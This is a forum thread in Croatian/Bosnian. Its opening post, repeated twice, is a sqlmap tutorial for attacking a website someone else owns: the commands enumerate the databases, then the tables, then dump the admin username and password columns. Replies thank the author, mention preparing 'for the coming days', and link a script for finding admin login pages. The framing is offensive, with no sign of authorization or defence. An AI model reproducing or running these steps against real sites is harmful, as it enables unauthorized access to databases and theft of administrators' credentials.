SQLi tutorial
4 posters
Page 1 of 1
SQLi tutorial
Za sql injection ćemo koristiti program imena SQLmap koji se pokreće iz linux operativnog sistema, točnije backtrack5.
Prvo trebamo pronaći stranicu koja je ranjiva na sql napad a kao primjer sam odabrao:
[You must be registered and logged in to see this link.]
Dakle, otvorimo sqlmap;
[You must be registered and logged in to see this link.]
Kada smo otvorili sqlmap vrijeme je da krenemo dalje, tako da upisujemo 1. naredbu:
python sqlmap.py -u (url) --dbs
[You must be registered and logged in to see this link.]
Stisnemo enter da bi nam se izlistale baze podataka:
[You must be registered and logged in to see this link.]
Sad imamo 2 baze podataka, nama je intresantna LTD, tako da je sljedeća naredba:
python sqlmap.py -u (url) -D (database) --tables
[You must be registered and logged in to see this link.]
Sada ćemo odabrati AdminLogin table, nemora nužno biti isti naziv kada ćete vi to pokušavati, može biti: Users, Admin, LoginInformation...
Dakle sljedeća naredba glasi:
python sqlmap.py -u (url) -D (database) -T AdminLogin --columns
I dobrivamo username i pwd kao što slika i pokazije:
[You must be registered and logged in to see this link.]
Da bi dobili sada password i username upisujemo naredbe:
python sqlmap.py -u (url) -D (database) -T AdminLogin -C passw --dump
i
python sqlmap.py -u (url) -D (database) -T AdminLogin -C usuairo --dump
Svaka od naredbi se upisuje zasebno.
[You must be registered and logged in to see this link.]
Kao što vidimo iz slika pokazuje nam se usuairo (username) kao user isto tako vrijedi i za password.
To je to od mene za sad, sretno svima !!!
Prvo trebamo pronaći stranicu koja je ranjiva na sql napad a kao primjer sam odabrao:
[You must be registered and logged in to see this link.]
Dakle, otvorimo sqlmap;
[You must be registered and logged in to see this link.]
Kada smo otvorili sqlmap vrijeme je da krenemo dalje, tako da upisujemo 1. naredbu:
python sqlmap.py -u (url) --dbs
[You must be registered and logged in to see this link.]
Stisnemo enter da bi nam se izlistale baze podataka:
[You must be registered and logged in to see this link.]
Sad imamo 2 baze podataka, nama je intresantna LTD, tako da je sljedeća naredba:
python sqlmap.py -u (url) -D (database) --tables
[You must be registered and logged in to see this link.]
Sada ćemo odabrati AdminLogin table, nemora nužno biti isti naziv kada ćete vi to pokušavati, može biti: Users, Admin, LoginInformation...
Dakle sljedeća naredba glasi:
python sqlmap.py -u (url) -D (database) -T AdminLogin --columns
I dobrivamo username i pwd kao što slika i pokazije:
[You must be registered and logged in to see this link.]
Da bi dobili sada password i username upisujemo naredbe:
python sqlmap.py -u (url) -D (database) -T AdminLogin -C passw --dump
i
python sqlmap.py -u (url) -D (database) -T AdminLogin -C usuairo --dump
Svaka od naredbi se upisuje zasebno.
[You must be registered and logged in to see this link.]
Kao što vidimo iz slika pokazuje nam se usuairo (username) kao user isto tako vrijedi i za password.
To je to od mene za sad, sretno svima !!!
Gost- Guest
Re: SQLi tutorial
Hvala, na žalost puno ljudi pa ni ja neznamo sve tako da bi bilo dobro da svako napiše pokoji tutorial kako bi se stigli pripremiti za nadolazeće dane.
Gost- Guest
Re: SQLi tutorial
Prvo treba netko objasnit ovima sto neznaju za backtrack sta je to i to..
buba- Alpha
- Broj postova : 10
Join date : 2013-06-13
Re: SQLi tutorial
Ovaj jeli ovo BackTrack 5 ili r2 ili r3 ß
meris- Alpha
- Broj postova : 9
Join date : 2013-06-15
Re: SQLi tutorial
Za ovo i ne treba BackTrack, skineš Python, skineš SQLMap, pokreneš preko Python-a i pratiš ovaj tutorijal.
Btw. SQLMap > Havij
Btw. SQLMap > Havij
Krazee- Alpha
- Broj postova : 20
Join date : 2013-06-21
Age : 28
Re: SQLi tutorial
a evo i perl skripta za trazenje admin login stranice na sajtu,http://www.sendspace.com/file/ir9dds
MedioNNN- Alpha
- Broj postova : 5
Join date : 2013-06-29
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum
|
|